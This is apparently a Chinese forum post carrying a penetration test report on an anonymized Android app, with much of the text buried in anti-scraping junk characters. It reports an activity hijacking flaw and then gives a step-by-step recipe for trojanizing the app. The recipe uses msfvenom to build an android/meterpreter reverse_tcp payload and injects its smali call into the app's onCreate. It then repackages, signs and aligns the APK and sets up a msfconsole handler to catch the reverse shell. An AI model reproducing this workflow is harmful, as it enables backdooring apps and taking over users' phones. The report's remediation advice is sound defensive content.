, I; k- ?6 R4 T ( u6 t- _3 R, l% B* Q4 ~( w 1-2 测试结果 ( m {" F* y* ]) k! D2 A + i" U; R. J- W. q4 m" T

0 T4 Z" u- C4 ^, y" X! V; s' @# }2 E7 N) ^" U7 F# m# [1 _

3 s, r; `9 I1 H5 ]7 `6 Z/ ] + W# t9 r- a, A9 k' \   7 h9 @1 j: S# u2 _ ' G+ k$ h: r* p/ r' L

) q& C& `) m' ] Y9 c- X1 m6 A, P( Y) b2 B x

1 G$ a% ~3 K4 Z0 _1 S9 H3 G# ~2 ^8 o* C. q* ^" |: t 2 检测结果                    6 R' g& `; ]- d8 v4 m % { a! V+ e0 v2 y" F' A

' U6 c. X$ A* m* K# q 7 T" e5 h2 @: {- p

1 h1 Z9 }- g" n$ e1 q: f6 k ; p( ]( A5 D9 }' [5 m 2.1 某某某 9 Z) e' x/ o5 H# N1 z, [; [ + G# N0 C: r* d5 W% ]7 T2 E

$ _8 B3 k% m2 L5 N : X; d% _+ V& Y+ J$ x- o

) \, [3 @0 D7 f: K. N) e, B& S1 o0 j* U. e o8 R' [ 2.1.1检测目标 + R9 u5 J. S! U8 s: L$ J ; M% W; i9 [& e9 B' j+ r

$ f% o1 _% A/ J4 P - F: D! w% ^3 c. C( b3 v

7 g- j0 H7 ?8 S# L- T8 a ' r7 x! r7 e: O* U. E3 H 目标地址: 某某某某某某APP , W1 ]% ~6 Q# `1 j2 q2 b' |' ^: P 8 P7 _* C2 `! u P% f( Z3 O; `* o

2 `, w# H; ~1 s$ F2 n( m# H 0 I Y/ B; i y* u0 b

1 \( M0 n7 k4 X8 |( K% F ! m4 x# Q, n1 d* f 2.1.2检测结果 X; A t6 o1 j9 V0 F7 n. \ ) v7 b8 e: `. ~, A: d

$ c+ w' N( O* f& o* J& z- E% D% o1 V6 v5 Q- B

1 j* U6 |, z: A. L7 C0 D: @* Y {3 W- T' A0 C5 F8 Y 2.1.2.1 1 F+ A. h: F$ P3 V$ F. b- j- \# j / Y% q! U* t' V

0 P; ?! b' H$ f+ a5 _( K ! b( P$ ]+ q$ m- D. k+ Y

" i% @6 M- V: E3 X" H2 W0 F8 A# a9 x" P+ m0 u9 j. u& b. j 漏洞链接地址:某某某某某某APP 4 n) k& j' \9 b2 C1 b$ Q& V/ X- V! p- j$ o' ?2 x

3 C Z. H, g3 V: `1 G& a) v6 F8 {: K) ^. i; J7 O J

/ U/ q, v. P* k ) Y5 {7 Y5 V s$ h1 h; j) ^) i* P& x   6 q+ ]3 Q) U! d+ m; \+ {0 n# ]& p" Y

% s" M0 f, Q7 H, C. O, i3 l! J. Y& i+ x- N* L( E

$ X) E z c& }8 S" Y: D/ p( i% @% d! f m2 s. c# z8 @7 D 漏洞分析及取证: : F6 h5 \6 N- u" d9 V ! d# y: W) ~% ^' X; Y

: P2 A+ T% x2 L. ]! K( J- c7 J * x; t, v+ ~, R, i3 T7 _1 C

4 y9 J7 y f) u; \+ D: D4 h' I1 p8 \- z( u5 D% s! u* }                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: / b' U! W) Q. l, t7 k 8 w, i* ^6 a( I! O$ ^

& g& k3 |" T8 }1 A' X# U+ `, f1 m+ Z5 U, `

: D- a0 j- p$ o( [6 F7 z1 f3 ? , y2 m9 k* O: L3 i) x      8 l4 M1 e8 n, c1 m 5 T* d# t' h9 O( d9 B

; ]) x4 O- R- G0 s/ K7 y 4 h7 Q. ]( |# c$ Q- a

" P J" b$ ]+ ]2 Y( k( T0 M / T, Z& \! u4 A1 N                       % U, R% m$ w7 P: S [) _' n- ^$ I% o7 c" l

( i. D# c+ V% j4 X: n- A/ Y) a ) `5 }5 Z4 d# \+ G

: K# Y( L& M# `4 `8 R 2 Y! J9 ^ Q* D* x8 L7 j ( g9 V* g" L- x4 C8 U/ ~ 8 D& o8 P# B- q* r3 X

; H1 _7 G5 F& ^( @' b3 q$ ` Z4 Q p. b p& a

: U, k. f, u# h9 j9 Y6 d% R2 s: J 7 C2 R% B$ u& K2 ? # W2 \8 O: V t2 u4 t- P+ n- C: G9 f" \) U4 i

) E. g$ U; _% ]0 G# r) ~+ t - j) z' ^& \3 {" i* Z7 K- A% u- p D

( W, Y$ h y" X) V( h7 [ 6 }0 K/ Z4 [3 y9 f6 E8 ^ 7 i9 w1 g5 [1 b' |+ d: Q - P8 e3 R$ }. i5 Y

. ~- w; }) |' f l! G' s, E " u, h: ?1 Z9 J1 Z; c9 F2 `

2 j: K8 T2 u0 r6 S+ B" o( L T6 X* L8 z! N& J- G 漏洞危害:高 8 b' A- y( L' |. V) W * z2 D) r& ]. A

! u S9 w6 c' Q0 x" I# R- ~: x4 d; J4 Y$ w+ l z4 _
6 ^3 q; e7 H$ z3 e- S' ? 3 Y+ l$ B, R5 f1 ~1 J ; C" }# m: h( ^/ V( k: I2 Z- y0 U0 p) m- x; D0 p& \( \8 W* u: \( A- [1 k3 `3 N% n. @! X' o, m/ G6 G& X; D( a' e: p9 v: X' \0 e7 E- R# j: y0 h' g% E$ G. V8 A9 f* ~0 V! b2 m# `2 P0 |2 {3 r) h/ ~) [- |/ _9 f( P$ Q* L& c( D% h4 w% l5 U4 D1 K9 j% a0 u; J6 d1 B. K( o- u) R+ l: B3 q- X+ E0 n2 J) L- [: Y' f, N9 x( G/ w( j1 m4 m; T) \7 G2 G0 J! D- ?3 L6 ~: n% |9 B8 { b3 ?; p, r/ [9 ~% Z* P. U6 C) O: ]& |; v0 _9 ?9 J1 T4 f [* n8 M- R7 \ ]1 G+ c. t$ @3 t" V j1 S& U5 u+ c* t+ I1 v2 \. a7 a, v1 G6 ]$ x, q. S9 w. }8 A3 i' o C' t6 `# A, ^6 T" i5 p7 h% I {
0 M* u- X, i! N5 J: h5 g+ z% g * w4 ?6 v( R2 Z) \

8 b2 g _4 X/ S) x, [) f3 }3 G ; y$ g. j0 {; ?/ |, R) H9 e2 | 严重程度 2 I. a$ c8 J8 K" x# f - C; C. @% K3 O9 b2 ?' p

n8 G0 _) L- Y y3 y; O/ v. B # j$ f& G4 Z) `+ o
3 G& j# u% n+ n" I- ^0 ~% o7 g* u/ {6 p1 Q6 W" _0 @5 K

4 _" P! c+ S$ l+ o$ S" C $ L( w% V4 ^3 g) A! U2 { 8 A0 V, L+ J2 u. f% w/ ^* A) s) e 4 k D/ G+ s) Y

( j- y3 K+ L- E2 A. D. M/ G4 E6 l 8 d X+ b3 ?' }4 u' G) }6 |$ g, a( c
- I& q3 Z! T. E- _" B0 K% N % z2 U9 B* Q7 G) {5 K

: Z; B) \7 r& r " |8 C$ R7 s) Q2 T5 M% u $ m z; d0 q* Y) C% K" h& ]+ t2 ^2 f9 k, y0 w7 k

2 R3 q) L% R ]9 a& ~ i. ~2 ~ & H7 v$ s C) S1 x# K; s" Z! G- q
5 [ \: R- K- V& X' o7 K3 g3 O% B8 z& {

$ {$ q" Z4 \' c5 j, f6 u . |% f; H+ A, Z: f; R & g. D( Y8 @3 T+ R0 P" D8 x2 c4 m5 u. E% j

& E% p; O* B/ S _( Y0 \. \4 R/ Y) @5 z9 K+ `6 x1 v; [7 Q; Y) X
0 L- d( I M( ^. ]% o! w , s8 ^+ W4 W1 ~: W5 x6 }/ m9 S2 l/ b

* y5 w' w d( w- c 8 P) L; W6 O4 i4 u   , h' I; I. S; G# w# U 9 ]0 L! u0 q8 l5 k. W3 r3 |* O

$ w+ [4 R) Q8 q8 U ' B$ l5 P, x0 T1 t! O9 N- F# m V, R
' V4 i! j: t% g) f + V$ f. t- e/ l: m1 V& \; p! `; ~0 b

0 \1 x3 V8 l( E E$ B/ a 6 e! d, \& C3 q; _ q/ S! z " X4 N3 o. ]7 ^- |) \' r 5 [7 v" |1 |/ }/ F/ g

6 i: i/ c q, T$ K' k, ] / a/ m1 x( `* G, Q
* K: W" Z! v( ` c [+ D2 S; Y! A/ z

( d, E6 R2 w. h' z+ n* ?: V ' a, o3 w+ V4 U. E   ) M& K$ e0 @ M# @! m8 I1 D . |% K7 g# D0 e6 d; O

+ q" q$ x A1 C* r8 G5 g% E0 n& H ~7 y$ @9 i8 u
2 C9 g- x9 u" R- \ j9 z + k, U0 M% p& y. r
0 ]% B4 e& s6 @0 H7 r/ \% b" N ' w+ N3 _0 w8 D

: j- H* M d/ B" f+ U" m3 J% ?% N! A% N4 _! q   & C, H; f! Q, `+ U3 q ( r# b" M9 b; @& h/ k. i3 U

* [. o& [7 N7 n e) P+ f& L ! q- d! m; j3 a3 L6 m. ~8 \

) H# ^# s* G. i # L$ k( }3 A6 G. K 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ; x6 W! _8 ]6 c5 [9 y! J1 [' [, E# `0 } k6 t9 O

" \3 |; d. g' |, Z, @" z& f. e( ]! i1 `$ j( T

6 D2 }4 _. F& i x; M. u! e # l. S" N& t+ p, `% E- Z, l9 Y0 S' w           2 H- |8 ?: M+ s0 i5 `/ g! D4 B) ~. y

' Z, p! i) K6 s& H / k& v8 `3 N, r# ?+ s2 i: n

6 L& g0 N, e9 Z ' o+ s* v! s7 F7 C6 L0 O   1 L6 t% I" O/ q& U. z) Z7 G; Y6 ]2 }# {4 F) }" u

! F1 t( w* W& t. k4 X5 \4 T ' G: `! ~8 d3 w4 G( v# |% \, A1 [( G

! T5 c3 G. c9 ^* } - P2 k. R* Z9 s6 l+ k 2.1.2.2 - _' V5 O+ |. ^4 m; d/ k6 c$ T 6 D9 ~. N4 A s( n+ o, F

& y5 g8 m# E* F3 B9 m4 h. U5 A" I& C. `$ W

7 a& c7 T$ k6 R; Z3 Z: ]& x4 Q9 l( X( \8 j 漏洞链接地址:某某某某某某APP ; ]& s# w: v( t* S # E2 ^5 _3 u* y1 l

: r' F3 D$ W) G( E2 W) @9 b7 z6 N$ u) d$ T% x) }7 W* p

, o, Q. P1 @- {6 v2 ^, k( b) o3 Y. w& j5 F U3 ^ 漏洞分析及取证: 1 G1 U. S1 ~5 N( A 0 b: _8 _" Z* K% g0 ~

* I9 Q1 b) ^7 r* {: {3 u+ w1 r! Z

0 u( d B/ l+ ?9 ?/ T, d0 H8 D. x8 z# N. E/ g                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: & I/ ?# @1 K& M# ?/ ~4 g ( H+ W/ b( G2 Q3 x( N8 B

" \& l7 ^( A, u7 |. ~( }! C5 p7 c( B' B+ u- ^& B: G

2 w7 z2 K# Z b2 r" v( f% K8 q9 i% K. \9 U* K4 j8 d Metasploit 生成木马 apk # N5 @* F6 F) R' _! [ H/ {& e) j3 t

; y, u2 f) Z" z$ ]. m* \. @6 R+ \( H7 R' ^

9 y7 J& T5 k: ~9 ` C' U3 u* B; t* q; Y$ _( g2 c msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk , {& ]7 O8 k) m: J( U6 u , x. E7 {) }3 I5 Y9 Y# Y( F

! e& A4 S0 |. d. k" M ' A: O: o1 {, g6 E) A

}8 u1 x& w/ R7 T$ o+ a 5 g: D3 S" }% F 反编译目标apk和木马apk * A& Z: U/ `. q* E6 ?$ L' d! `$ Z0 w B6 a6 e) Z, c

4 K5 E9 i) S5 }7 C! G; F; b6 F, J4 D8 X8 q5 X2 b

. c# o8 E; u- ~8 v' ]" ?" M - W( l" v3 a8 @& T3 m apktool d target.apk
' K8 g3 S8 M j9 i g' m9 T4 {: Z1 o, J0 v& B apktool d cockhorse.apk
' u( h) F: K* M 0 F. N; m% q* k: ]/ W

8 z4 Z! P& E0 G' H p* c# j + s+ Y$ c% d8 f

" o# _& s I: \0 n0 y : ^ { s0 X, _2 a0 d3 ^' {. Q2 G 木马 apk 注入目标 apk # y2 `0 d0 d+ X5 L: j! G. G) L . t9 k# f. N, k% Q% Z P+ }

2 K6 Y/ X$ n2 E % K, h9 v8 ]. Y, f8 Q5 r! C" @

: i' y/ Q4 U* B6 V6 N% S- j/ k' a6 y' E1 c, G6 p u5 w 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
/ P4 |, _# U ~& d8 v. i1 G+ c% l4 Y invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
* {0 h5 o6 n" `! u8 ^! F, d1 C; o$ X# G8 [* A( D

6 P% E$ j/ ~4 K. K% d! z9 a + F# p! h% C: r. W* n! ^

. r5 l! j$ b4 m3 F+ L4 G. y' `* ] 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 + Z/ M. s' {& @2 D% N . w: c/ B. D1 \4 Z

8 G& E0 w) D7 v 2 y% ?; B4 p+ e% Z' n' k! Y

* R* ` o+ s4 ]$ z( v " L0 E# q& W1 ^+ ^ ~3 m& K8 B 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ + k2 |) ~5 q0 V, U! ^! `3 N! z$ @; ~/ }$ Y3 K7 E" I, F5 g

+ ^) u$ I$ k% z c- C) c' ~2 L1 E c) y( W( _4 n& H/ ]

. N. G2 i; k) M . z: x% U8 l* j+ s. e8 b 回编译生成最终 apk * T" l+ q/ h: h2 S0 \5 o0 O) S $ q: S: D7 Q6 N" W$ N

% B' W" E% r) A6 \- g6 ]# R4 v [ ( A$ f9 j* [: j, M5 t

2 |' Q: E+ F/ s# L4 k3 X 8 Y4 y# _1 W1 b( t8 a& D7 B H 重新打包 4 ]3 v. ~" U2 i) `8 A % @( V0 @2 R1 M5 J: j

7 c1 X* r+ e# ^- y' S , @. K y! }1 G. J' u. h

0 a6 E. P9 Y6 Z: S) h3 O / C2 \' v% o$ V; R6 M( r apktool b -o repackage.apk target_app_floder # v0 U6 d% H4 C9 i3 I 6 d1 d, P/ D& t) y9 w

. P% \1 E1 ~9 z: R+ e% Q# h 9 ^! r5 |/ o$ ]0 M; g7 I ?- a' E% q8 Z

: A& c) q% e/ ?9 ?: p ) Z; v' D; _+ ]+ v: K+ D 创建签名文件,有的话可忽略此步骤 ( r ?9 C# X b6 W 8 q' F9 J [/ ^

* Q9 G4 h/ H) `9 J# W7 P$ q1 |2 W* Y# { ~# H4 _

9 }$ i z' Z3 G7 ~ 0 J4 P& v# u# j/ d% L' u keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                3 T3 V$ }2 X6 A/ S! u . D. R3 G& Y: l% d6 N% a* M6 O! N

! T# @9 F, J( `3 F' \" a8 b3 _% g6 Y" n0 R( w) @2 o

/ r# {4 p) \& E6 b1 l ; {9 @; A7 U7 ^ 签名,以下任选其一 ) z s9 l a- w; _2 {* { ; G1 P: \+ e; h9 {- H

1 a! X+ G/ Q5 Q" `% W5 ] ' F; _( d) r( [

3 L0 @, n* e( V- e 2 N! y- x$ a: r* ?) j3 {1 M jarsigner 方式 2 Y; S3 X% u1 e* X8 l3 b* y' R1 N4 w8 J# u8 {

0 k& }" i) s9 U, S: ?& ~3 ? 3 ? [+ Z1 f% M, v- ?

7 I6 p2 w0 o( f, h* l ! ^( f7 e- p8 [# ?# ]) Y jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname , ~/ x5 |7 ^. r ) ?. @8 F- j) L1 i" C1 u

! g$ r+ p/ W* t / o3 \- o( u1 w5 B: W

+ k! B$ R: B3 Q1 F# O 5 }( g& P2 P# o* q4 H8 ~5 h& u apksigner 方式 6 Q$ z$ v# O) w3 A {0 K ! u- k( `4 C9 B2 R

( M x: X, l3 o" s& E& o( F 4 w4 [' t' c6 U4 f7 T$ p

^& l1 \. y9 F }/ E5 U8 c7 [ Q% N! N apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk & r9 y$ N: K4 R$ N8 P: [% A: y - ?$ ?( K9 V5 Q, j

# n& D9 R/ N0 s6 U. m4 m% d6 _2 A $ h0 e6 K* n$ M

% p0 [( A+ B$ O" [# ~: ?% w( U; q 如需要禁用 v2签名 添加选项--v2-signing-enabled false , B; b, r# w) L# B) [! Y" W* W 7 _. h2 T9 j, j5 I' B+ W6 X" x

& i$ H( _" j, n5 n : l, ~3 x6 i5 J$ M

6 k1 o2 W+ ?; y& m- X/ |0 ]# E 验证,以下任选其一 : \! X5 t$ p' D+ J R* P' ~2 L( Z3 w# D, u, E

: k4 V7 e: \7 o+ W* z) A- x4 V- Q: ^2 [! T3 z& O1 N5 |

. v) q& R9 x1 l8 u7 G3 d : K& k4 T* ~( v2 a& v+ G jarsigner方式 ( \: l. o# A j ' D$ C. S R3 ?$ t4 k

( B6 {; n- W; n1 X# `/ p6 n- s 5 t a8 h; X' r6 g! W

) T7 \/ }+ _3 v8 P' h0 I ) W& x+ N2 r# F/ e jarsigner -verify repackaged.apk ; \" A% ~( W; ]/ _7 ]8 j. R ]4 x' q& w a: H

0 M8 G4 Y1 N7 g' J$ C: d & E& Y2 p/ P# H: K5 i& v2 w

4 g9 R( h, P# [, u& b" N! L0 H. R/ b: X9 Y apksigner 方式 9 f+ e' v d4 Q5 w' D3 U$ k" K" F @: I

1 ~2 z U0 s, ~# p# m7 p1 g. @/ |

" h& @ R0 D4 ?+ z _* M 9 V* \) ]. `+ }. `8 F apksigner verify -v --print-certs repackaged.apk 1 D; m& t5 |4 o J2 u ; h0 b! B, n% T n) W

4 |% A1 r, w+ ?5 [' G$ g 7 }- V- j! G4 u# \. F

4 v" d p/ R9 b/ O9 K5 f7 ?$ H, i4 y5 ? keytool方式 8 U7 X8 Z0 x+ |' j1 q* z3 G/ C , w# L, Q0 y5 g. q% n0 t6 \

) b* E3 t1 `# l7 ]) P . E5 q' O* k& ^4 e; ^: w5 }

" {2 e! z- f6 a% s. [) w * k* z; Z) z4 F4 ?/ e keytool -printcert -jarfile repackaged.apk 7 o8 L( X8 F' R/ }/ S* K 8 E: o- D$ x6 Q1 x+ [

) P* Q# J% {+ q6 P # T2 f" m4 o# @0 c/ M/ N# y* u3 S

! b1 \$ t$ r8 Y6 e3 m/ a% D 9 H- s4 O) [0 v4 r( e) w 对齐 B$ O; [" }! I+ S: X; b0 q) Y. f8 [! }& a

& ]' x+ d3 J! ` I * \6 W8 }- X+ f A4 V

) b+ U2 ]3 h# A$ k ' y5 {( z. K* x. Q0 d% ? 字节对齐优化 + d6 M" m9 C7 z D + ^2 d$ R. @3 g6 s+ {

' {+ L; Y" K- F8 ^& o& S( O - B" `+ T. J$ I* _1 T

# R. ~0 D. k5 H; ^$ y; s/ G* o2 h* Z9 y/ \; | zipalign -v 4 repackaged.apk final.apk : g) X! v8 r+ O0 C8 g2 N( h 1 g# W0 c0 j# a

. Y, \- B* {; w l8 R0 W$ D! s4 B4 Y

2 g1 x: u* m" o 3 v5 \+ d2 m- }4 r" o0 A+ b3 C 检查是否对齐 5 s' `8 Z) v' Z ]0 W, n$ E ) ^6 H$ d& |9 X) q2 J- Q7 I9 j

9 s1 s2 x @5 v( ^$ k+ U $ K; [. E! E3 \ B6 G% T+ t

" S6 P0 U3 I# N9 G6 e" h 9 T6 t9 @- S5 o5 u zipalign -c -v 4 final.apk : T8 Y/ P: {3 } {3 q9 l + S) A0 w2 C6 x& s F

6 q- R3 I8 g7 c+ q$ T 1 L$ P: R/ u3 J% p) f

& j1 u9 E1 Q* ]! M. ?/ W9 Y6 x ) P4 s) m6 y: z 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 ! H5 S, l2 V0 a+ t1 U $ ?! X5 F' x, L# T+ O% Z/ S! w5 T/ G

7 g% D6 d, {8 {1 T : J, p( s9 a1 G# Z4 H) {- w/ `

+ H; X6 `' c) U* {: k 3 l4 W0 B& u3 c e! z6 r3 F 启动Metasploit控制台,配置参数等待上线 + a( |4 |* I4 I" v' } & C( D( ^, W8 F5 b# a

. A4 c) R: \+ {3 e $ d$ x) n7 \! r& l, A. v

; t( q8 `& J- {' S& Y9 J$ P , A9 u% z O. ]( @ 在终端依次输入如下命令 5 F" }% A, o7 S- Z, c( y, E: r* B7 V" X/ q8 b, `( W9 @6 ]

, b7 w& T4 U7 v7 L q% K" }8 o & E* W. C0 M7 h6 w: ]- W) _

/ M j* D( z; I ; I) b- V% ^& C+ j5 x msfconsole 9 G3 |% `4 e4 r$ w9 X9 r" k - V- D J/ L8 H6 \# C

5 h5 b) Z4 ?5 y/ q& D! ` E% R" m4 s ( l9 X6 [/ D6 X/ G7 s

! g* G* k3 L2 D) N f % W1 \' M' \! u7 C E use exploit/multi/handler 3 d) q0 k1 V& s! b& j$ U( O # a2 T$ ]1 a7 |+ ^ G# t

2 q- f0 e0 T/ m, {# T3 w8 x; E) B. ^# w6 d- P# U

- Y1 q# }9 n5 O' ~# ?6 v 3 S6 v( {- Z8 Y: Z, U set PAYLOAD android/meterpreter/reverse_tcp ' H- I# T4 S3 K9 Q * B7 ?- _( g/ P4 m/ n& f

; M6 _+ w+ @4 x) T: V: N5 s1 J( l. V+ ?. D

/ Q5 I% X6 T! c 1 _7 l0 m! U/ m1 I set LHOST 192.xxx.xx.xx / l7 W3 f G* y6 b6 r* T # c/ E# S6 O: J# K2 Q

+ E" {5 T' ?9 Z9 [ x3 r4 P / i H: r, P @/ w5 Q

' A! G } ^: ?4 H" B2 V 4 D# Z: j3 u7 M Y* @7 k set LPORT 4444 1 u: c7 `: J! V5 Y 1 n! q2 F4 n8 R* w$ J

; t, f. V8 F' {- q4 M3 y ( |. w% u1 w3 v- x2 V% U% r' O+ x' j

3 `. k6 i0 r( F: s f 9 c ?) n* A5 @* x) [ exploit ' X" C/ z" n3 ?/ r8 `8 X " }& F6 _/ B$ T C; T# Z6 ~) Z* z

4 M. e5 y( d' n% F7 g9 _: @5 Q $ Q. w1 `5 F' P% K

+ i1 f5 Y3 u) a% k5 c ?3 P- Q7 W: l, K 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               f* u+ v0 }3 {' F4 ?9 L 1 `2 n0 ?0 z" O6 H

# W6 u' \0 o6 N0 T/ J6 @3 [9 r- t: U. i* p! r) w7 A }

3 ^0 y0 ~9 C; m2 c: a8 f5 I 1 W/ I: m' t4 s6 G4 x2 c, j 漏洞危害:中 ) L; x( \, c: S* |& m # W. b! r8 o o, C

2 @3 \$ ?% D K! I8 N% ^1 D' {- W ! V0 ]4 n6 ?9 }0 \* S/ L0 z
, A: X) |- x( f5 r% J4 n R7 c9 B6 i& `* Q4 E' D ; e% n1 z9 y1 J' R, w & r7 { @( r! j S E, H ) g4 {8 I7 ]6 I5 k; f8 v% W7 b$ @- X5 v3 ]' I) \8 E# Y: A! h4 Y: h$ o. V3 ^! {* q) m+ e1 |+ z% o: R% h. m' C* {+ b- I) Q3 _3 I8 y5 ? Z6 S, H& H# T* Q7 D4 h1 R7 b! I2 {- G" |2 N7 r( J8 c% B! B' u! Z& E' l! X+ G+ C2 x4 z* q9 D8 G: r4 Z1 Z @7 W4 o" T- W p7 R- e( e0 F, d W% h. S; _6 e! v& B% ^9 D- N/ b: r( S" n3 @5 t7 N2 o9 d! c. O+ a X! M, E$ s' ` ^1 U* i3 p- `! I* S8 D; C( V0 X6 G) f: ]+ _6 n: l1 d- k2 N$ z( M& @# h' R7 [$ v, s% \5 @* {9 r) l9 f Z0 w7 B3 s9 V- V0 z' Z9 o% N7 x( F" v+ A4 M7 `9 D/ V" y- W! |& @- }, y0 G$ t4 r, K* M% h2 C6 W; P8 j' l( B( m0 f) ^+ |& I7 B( w0 N# q3 X0 J$ d4 O3 e/ b" D1 Y' H0 g0 R
: q" y- P9 d! d/ {5 ? 5 ~8 d5 l; {2 `( G- b% X) d9 H$ r

. G! R; {. J$ f; h4 {( Y' {- U # ?4 m! S0 L# a2 ?# ^3 g 严重程度 2 m7 d0 G0 y* Q9 ]5 Q/ l8 t 7 n# S: K- m6 d1 ~5 E8 A

" u# \; }" m% ~* l! ~ ; n5 T" s1 d9 k
5 f$ c- O8 K" C; y6 [$ a) a* u $ W) X& J" A/ g1 A+ A" e8 u* C4 D* ?

8 s& }/ s* M$ h; F% Z5 T/ T 5 E5 j1 |) |9 f9 b/ ] ! c- J! o+ Y* d- X+ b3 g5 `/ H / f$ }, n2 ^& y6 d- s) I& b4 a

8 C I) e6 H; _% \* P# W( a5 W ! d, T( {# Y t4 {3 e& g& A3 F' L( s
% o# v) C @0 C# d/ y0 ?! p! K H; l7 C$ E! H/ c! b1 w. o7 _

/ @' B! x o. V: m/ J% l+ @; ^ } # ?4 ]) M1 J! d : r# O, `# J! |, R( S" }) Y 8 Y# g' i( ` {+ r' s' l

0 s, N" N$ m% X3 x. h8 V/ G- T- a4 q# X, b
7 U: x$ c; C2 ^5 p/ y! H ! n ?, X' c7 k

2 V) z" M# X/ G% }. e6 C) H8 v" `" }- N( u8 R / X2 q8 ?' `2 {3 X$ C 6 V5 y$ {) x4 i4 ?& I1 \2 v

9 v& ]" _2 c+ q) [# C9 ~# @ ; J1 N' O! y2 y( w/ W
. L. V; M4 ~7 }" h/ e ' G6 h" T$ T) T7 w% G7 H( q/ ~ 8 ^! q6 K2 J, u8 S 9 L# O/ e0 u0 t& A9 B: w

, X; K( I( e4 w. y7 b1 j$ k& y2 ? & B* c% v, G; [; D2 c   " H. b+ ^& I' D & t. N0 `: ~- n+ E0 _/ Z0 b

5 [$ S. |5 i6 |- K# W: u( C# X# p. U8 w4 ?! ~8 H% X: s/ A
2 n7 q1 F3 ?7 V" o- g 2 d" M- I/ y5 j8 v1 S0 j

4 |4 Y; F" i7 u! S1 A8 Q; ?% `: U- }; i2 t * R9 Y4 X5 W/ Q$ v! D ' V" _: }& P( x6 f

! n) n7 M! W; P- x9 `8 H( N* d. t- |# X8 e5 F- P; R# x
, s5 T; H7 `/ C 9 l2 u1 ~, D% G. L Z+ k& O 5 f+ c. Q h8 U; F+ ]4 V9 u ) _4 g; s7 V) e- c' z0 @

' i7 K9 z% p% H9 { 3 ? \, v; _8 V1 g, b$ b$ o   ) o9 G1 C' a" p " f# O8 X" ~: c8 ?7 P

" m# N" Z* v7 H; ~ ; G ?7 L- S4 o! X+ d
* q" C. H9 ^5 f p; f0 H 5 c4 [+ g. V2 g& |! d
0 C" V" O6 N, p. U( m- M5 a; h, q4 N }1 V

) \6 W' y9 E8 O& ] ) g5 n$ ^1 C o3 i3 s9 n; g k   4 w0 Z6 j9 R4 G- O" C) `: x1 S) W6 ^! d( y- ]

3 e( L8 W0 n- N! g/ N2 ]5 B+ { 0 I* U0 M7 ^0 i6 X) a* ]8 V1 @5 k

5 x3 l( u( V" a: N% ^ % q d* F& {+ Z8 S% g7 O6 M( v 修复方法: + _) A7 c) X0 x4 ^# H5 f7 S " X. l. T0 z4 `9 `

% \7 i- v3 H- k: o0 O5 m Z/ E6 D4 [; g! ~8 M

% E1 S; I p- K: D- a$ W- u: | ! m o U$ ^* ^0 i/ m5 X8 b               1. APP 启动时应做签名校验防止二次打包。
V+ h! p5 h( _( D/ V4 o( u2 @' z! E }7 E5 R0 B& ` Q 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 , @$ a' e7 Y7 A5 N- F ! ?1 v- c6 n* v, y0 N

" G7 _$ r2 e% G9 ^ - i. y% V0 c5 g; a/ h1 A$ l) w( ` 4 N4 n6 n1 b/ A; V 2 h6 e9 k7 Y) Q5 y- l6 P

0 k+ }3 f- X2 a* D/ i3 k 6 j! J+ D& X" @: S2 g   % W$ c! D2 \; h$ g& o0 n- U 1 v/ V- b4 s5 f3 F D( `4 e3 {

7 |8 Y9 B# M$ W% A; B; B; e ( k( f5 H3 O& S: {, e- ~ 0 M3 m9 H. j6 Q$ a5 ?3 _! L4 f: O% R& H; t0 U

A9 |% b+ ~& C/ Z3 L9 Y" T( A- g' m8 L/ q3 T) L8 H7 D
3 r( _' Z8 |7 p5 u" f* l ) Y* p! l0 L* C3 F$ y

1 Q3 L" s3 d1 O $ R- R8 M; r h9 G4 q3 P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表